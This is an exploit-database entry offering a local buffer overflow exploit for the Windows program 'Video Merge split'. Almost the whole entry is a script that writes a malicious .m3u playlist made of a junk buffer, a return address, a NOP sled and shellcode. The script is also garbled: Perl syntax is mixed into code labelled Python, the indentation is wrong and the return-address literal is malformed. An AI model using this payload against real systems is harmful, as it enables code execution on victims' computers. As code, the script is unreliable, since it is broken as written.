Video Merge split Local Buffer Overflow

2011-08-24T00:00:00
ID 1337DAY-ID-16755
Type zdt
Reporter Angel Injection
Modified 2011-08-24T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            #!/usr/bin/python

import sys

print "###################################################################"
print "# Name:Video Merge split Local Buffer Overflow                    #"
print "# Author:Angel Injection                                          #"
print "# Home Page:http://dev-point.com/ http://sec-krb.org/             #"
print "# Note:Iam Angel Injection From the country of civilizations(iraq)#"
print "###################################################################"

try:

$junk = "\x41" * 1600
$ret = "\x77\xBDx\xEB\x7B"
$nop = "\x90" x 20
shellcode =
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8c".
"\x35\xa9\x3e\x83\xeb\xfc\xe2\xf4\x70\xdd\xed\x3e\x8c\x35\x22\x7b".
"\xb0\xbe\xd5\x3b\xf4\x34\x46\xb5\xc3\x2d\x22\x61\xac\x34\x42\x77".
"\x07\x01\x22\x3f\x62\x04\x69\xa7\x20\xb1\x69\x4a\x8b\xf4\x63\x33".
"\x8d\xf7\x42\xca\xb7\x61\x8d\x3a\xf9\xd0\x22\x61\xa8\x34\x42\x58".
"\x07\x39\xe2\xb5\xd3\x29\xa8\xd5\x07\x29\x22\x3f\x67\xbc\xf5\x1a".
"\x88\xf6\x98\xfe\xe8\xbe\xe9\x0e\x09\xf5\xd1\x32\x07\x75\xa5\xb5".
"\xfc\x29\x04\xb5\xe4\x3d\x42\x37\x07\xb5\x19\x3e\x8c\x35\x22\x56".
"\xb0\x6a\x98\xc8\xec\x63\x20\xc6\x0f\xf5\xd2\x6e\xe4\xc5\x23\x3a".
"\xd3\x5d\x31\xc0\x06\x3b\xfe\xc1\x6b\x56\xc8\x52\xef\x35\xa9\x3e";

f = open("Exploit.m3u" ,"w")
f.write($junk.$ret.$nop.$shellcode)
f.close()
except:
    print "Inj3ct0r Team 4 ever" 



#  0day.today [2018-01-01]  #